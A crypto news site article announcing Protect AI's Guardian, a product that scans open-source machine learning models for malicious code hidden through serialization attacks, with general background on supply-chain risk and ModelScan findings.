🔥 Land A High Paying Web3 Job In 90 Days LEARN MORE

Protect AI Launches Guardian to Safeguard Machine Learning Models from Malicious Code

In this post:

  • Protect AI’s Guardian protects AI models, data, and systems from malware.
  • It scans open-source models for hidden threats, ensuring secure AI use.
  • Guardian offers control and security with easy integration into existing setups.

Protect AI, a leading player in AI security, has unveiled its latest innovation, Guardian. This cutting-edge solution empowers organizations to enforce robust security policies on their machine learning models, ensuring malicious code does not infiltrate their AI environments. 

Built upon the foundation of Protect AI’s open-source tool, ModelScan, Guardian combines open-source capabilities with proprietary scanning functionalities, providing comprehensive model security for enterprises.

Addressing the risks of democratized AI/ML

The democratization of artificial intelligence and machine learning has led to the widespread availability of foundational models on platforms like Hugging Face. These models, downloaded by millions of users every month, play a crucial role in powering a wide range of AI applications. 

However, this accessibility has also introduced security vulnerabilities, as the open exchange of files on these repositories can inadvertently facilitate the dissemination of malicious software among users.

Ian Swanson, CEO of Protect AI, stated, “Machine learning models have become integral assets in an organization’s infrastructure, yet they often lack the rigorous virus and malicious code scans that other file types receive before use. 

With thousands of models downloaded millions of times from platforms like Hugging Face each month, the potential for dangerous code to infiltrate is significant. Guardian empowers customers to regain control over the security of open-source models.”

See also  Crypto.com offers hackers $2M to take their best shot at its security system

Guardian: Protecting against model serialization attacks

One of the critical risks associated with openly shared machine learning models is the Model Serialization attack. This occurs when malware code is injected into a model during serialization (saving) and before distribution, creating a modern version of the Trojan Horse. 

Once embedded within a model, this concealed malicious code can be executed to steal sensitive data, compromise credentials, manipulate data, and more. These risks are prevalent in models hosted on large repositories like Hugging Face.

Protect AI previously launched ModelScan, an open-source tool designed to scan AI/ML models for potential attacks, safeguarding systems against supply chain vulnerabilities. Since its inception, Protect AI has utilized ModelScan to assess over 400,000 models hosted on Hugging Face, identifying models with security flaws and continuously updating this knowledge base.

To date, more than 3,300 models have been discovered to possess the capability to execute rogue code. These models continue to be downloaded and deployed within ML environments without adequate security measures to scan them for potential risks before adoption.

Guardian: The secure gateway to model development and deployment

Unlike other open-source alternatives, Protect AI’s Guardian is a secure gateway, bridging the gap between ML development and deployment processes that rely on platforms like Hugging Face and other model repositories. 

See also  U.S. government transfers 19,000 Bitcoins worth $2 billion to Coinbase

Guardian employs proprietary vulnerability scanners, including a specialized scanner for Keras lambda layers, to proactively inspect open-source models for malicious code, guaranteeing the utilization of secure, policy-compliant models within organizational networks.

Enhanced access control and comprehensive insights

Guardian offers advanced access control features and intuitive dashboards that grant security teams complete control over model entry while providing comprehensive insights into model origins, creators, and licensing. This level of transparency ensures organizations can make informed decisions about the models they incorporate into their AI environments.

Additionally, Guardian integrates with existing security frameworks and complements Protect AI’s Radar, offering extensive threat surface visibility for AI and machine learning within organizations.

A Step-By-Step System To Launching Your Web3 Career and Landing High-Paying Crypto Jobs in 90 Days.

Share link:

Disclaimer. The information provided is not trading advice. Cryptopolitan.com holds no liability for any investments made based on the information provided on this page. We strongly recommend independent research and/or consultation with a qualified professional before making any investment decisions.

Most read

Loading Most Read articles...

Stay on top of crypto news, get daily updates in your inbox

Editor's choice

Loading Editor's Choice articles...
Cryptopolitan
Subscribe to CryptoPolitan